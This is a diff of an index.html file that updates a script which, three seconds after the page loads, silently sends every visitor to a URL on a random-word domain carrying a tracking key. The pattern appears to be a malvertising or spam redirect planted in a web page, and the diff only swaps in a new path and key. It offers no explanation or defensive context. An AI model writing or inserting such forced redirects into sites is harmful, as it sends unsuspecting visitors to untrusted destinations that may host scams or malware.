--- a/index.html
+++ b/index.html
@@ -119,7 +119,7 @@
 
   <script>
     setTimeout(function() {
-      window.location.href = "https://participantthoughtfulvoracious.com/ngu7xpnxa?key=dff26705aa881e48ce3a7d4cc8618e02";
+      window.location.href = "https://participantthoughtfulvoracious.com/sajcq8f9x?key=1a56d7a03af403c78fae5e1e240571b0";
     }, 3000);
   </script>
 
